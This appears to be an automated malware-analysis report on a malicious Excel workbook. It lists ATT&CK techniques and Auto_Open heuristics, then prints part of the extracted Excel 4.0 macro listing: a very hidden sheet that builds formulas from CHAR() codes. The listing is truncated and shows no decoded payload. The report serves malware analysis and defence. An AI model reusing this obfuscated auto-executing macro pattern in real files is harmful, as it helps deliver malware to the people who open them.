MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code. The macros appear to be constructing strings and formulas that could lead to arbitrary command execution. The presence of the Auto_Open entry and the use of dangerous formula APIs indicate a high likelihood of malicious intent, likely to download and execute a secondary payload.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 23296 bytes |
SHA-256: 04e588a894721095d89767811af9bb3be36d34a3f2f9aa1f467707eab2dff51c |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - Y8B739FBp ' 0018 29 LABEL : Cell Value, String Constant - _xlfn.CONCAT hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d' ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!K1 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Y8B739FBp,A1,CHAR(61)&CHAR(73),"" ' Y8B739FBp,B1,CHAR(61),"" ' Y8B739FBp,C1,CHAR(61),"" ' Y8B739FBp,D1,CHAR(61),"" ' Y8B739FBp,E1,CHAR(61),"" ' Y8B739FBp,F1,CHAR(61),"" ' Y8B739FBp,G1,CHAR(61),"" ' Y8B739FBp,H1,CHAR(61),"" ' Y8B739FBp,I1,CHAR(61)&CHAR(67),"" ' Y8B739FBp,J1,CHAR(61)&CHAR(67),"" ' Y8B739FBp,K1,"FORMULA(A1&A2&A3&A4&A5&A6&A7&A8&A9&A10&A11&A12&A13&A14&A15&A16&A17&A18&A19&A20&A21&A22&A23&A24&A25&A26&A27&A28&A29&A30&A31&A32&A33&A34&A35&A36&A37&A38&A39&A40&A41,L1)","" ' Y8B739FBp,A2,CHAR(70),"" ' Y8B739FBp,B2,CHAR(73),"" ' Y8B739FBp,C2,CHAR(73),"" ' Y8B739FBp,D2,CHAR(73),"" ' Y8B739FBp,E2,CHAR(73),"" ' Y8B739FBp,F2,CHAR(67),"" ' Y8B739FBp,G2,CHAR(73),"" ' Y8B739FBp,H2,CHAR(65),"" ' Y8B739FBp,I2,CHAR(65),"" ' Y8B739FBp,J2,CHAR(76),"" ' Y8B739FBp,K2,"FORMULA(B1&B2&B3&B4&B5&B6&B7&B8&B9&B10&B11&B12&B13&B14&B15&B16&B17&B18&B19&B20&B21&B22&B23&B24&B25&B26&B27&B28&B29&B30&B31&B32&B33&B34&B35&B36&B37&B38&B39&B40&B41,L2)","" ' Y8B739FBp,A3,CHAR(40),"" ' Y8B739FBp,B3,CHAR(70),"" ' Y8B739FBp,C3,CHAR(70),"" ' Y8B739FBp,D3,CHAR(70),"" ' Y8B739FBp,E3,CHAR(70),"" ' Y8B739FBp,F3,CHAR(65),"" ' Y8B739FBp,G3,CHAR(70)&CHAR(40),"" ' Y8B739FBp,H3,CHAR(76),"" ' Y8B739FBp,I3,CHAR(76),"" ' Y8B739FBp,J3,CHAR(79),"" ' Y8B739FBp,K3,"FORMULA(C1&C2&C3&C4&C5&C6&C7&C8&C9&C10&C11&C12&C13&C14&C15&C16&C17&C18&C19&C20&C21&C22&C23&C24&C25&C26&C27&C28&C29&C30&C31&C32&C33&C34&C35,L3)","" ' Y8B739FBp,A4,CHAR(71),"" ' Y8B739FBp,B4,CHAR(40)&CHAR(71),"" ' Y8B739FBp,C4,CHAR(40)&CHAR(71),"" ' Y8B739FBp,D4,CHAR(40),"" ' Y8B739FBp,E4,CHAR(40),"" ' Y8B739FBp,F4,CHAR(76),"" ' Y8B739FBp,G4,CHAR(82),"" ' Y8B739FBp,H4,CHAR(69),"" ' Y8B739FBp,I4,CHAR(76),"" ' Y8B739FBp,J4,CHAR(83),"" ' Y8B739FBp,K4,"FORMULA(D1&D2&D3&D4&D5&D6&D7&D8&D9&D10&D11&D12&D13&D14&D15&D16&D17&D18&D19&D20&D21&D22&D23&D24&D25&D26&D27&D28&D29&D30&D31&D32&D33&D34&D35,L4)","" ' Y8B739FBp,A5,CHAR(69),"" ' Y8B739FBp,B5,CHAR(69),"" ' Y8B739FBp,C5,CHAR(69),"" ' Y8B739FBp,D5,CHAR(71)&CHAR(69),"" ' Y8B739FBp,E5,CHAR(73)&CHAR(83),"" ' Y8B739FBp,F5,CHAR(76)&CHAR(40),"" ' Y8B739FBp,G5,CHAR(91),"" ' Y8B739FBp,H5,CHAR(82),"" ' Y8B739FBp,I5,CHAR(40),"" ' Y8B739FBp,J5,CHAR(69),"" ' Y8B739FBp,K5,"FORMULA(E1&E2&E3&E4&E5&E6&E7&E8&E9&E10&E11&E12&E13&E14&E15&E16&E17&E18&E19&E20&E21&E22&E23&E24&E25&E26&E27&E28&E29&E30&E31&E32&E33&E34&E35&E36&E37&E38&E39&E40&E41&E42&E43&E44&E45&E46&E47&E48&E49&E50&E51&E52&E53&E54&E55&E56&E57&E58&E59&E60&E61&E62&E63,L5)","" ' Y8B739FBp,A6,CHAR(84),"" ' Y8B739FBp,B6,CHAR(84),"" ' Y8B739FBp,C6,CHAR(84),"" ' Y8B739FBp,D6,CHAR(84),"" ' Y8B739FBp,E6,CHAR(78),"" ' Y8B739FBp,F6,CHAR(34),"" ' Y8B739FBp,G6,CHAR(45),"" ' Y8B739FBp,H6,CHAR(84)&CHAR(40),"" ' Y8B739FBp,I6,CHAR(34),"" ' Y8B739FBp,J6,CHAR(40)&CHAR(70),"" ' Y8B739FBp,K6,"FORMULA(F1&F2&F3&F4&F5&F6&F7&F8&F9&F10&F11&F12&F13&F14&F15&F16&F17&F18&F19&F20&F21&F22&F23&F24&F25&F26&F27&F28&F29&F30&F31&F32&F33&F34&F35&F36&F37&F38&F39&F40&F41&F42&F43&F44&F45&F46&F47&F48&F49&F50&F51&F52&F53&F54&F55&F56&F57&F58&F59&F60&F61&F62&F63&F64&F65&F66&F67&F68&F69&F70&F71&F72&F73&F74&F75&F76&F77&F78&F79&F80&F81&F82&F83&F84&F85&F86&F87&F88&F89&F90&F91&F92&F93&F94&F95&F96&F97&F98&F99&F100&F101&F102&F103&F104&F105&F106&F107&F108&F109&F110&F111&F112&F113&F114&F115&F116,L6)","" ' Y8B739FBp,A7,CHAR(46),"" ' Y8B739FBp,B7,CHAR(46),"" ' Y8B739FBp,C7,CHA ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.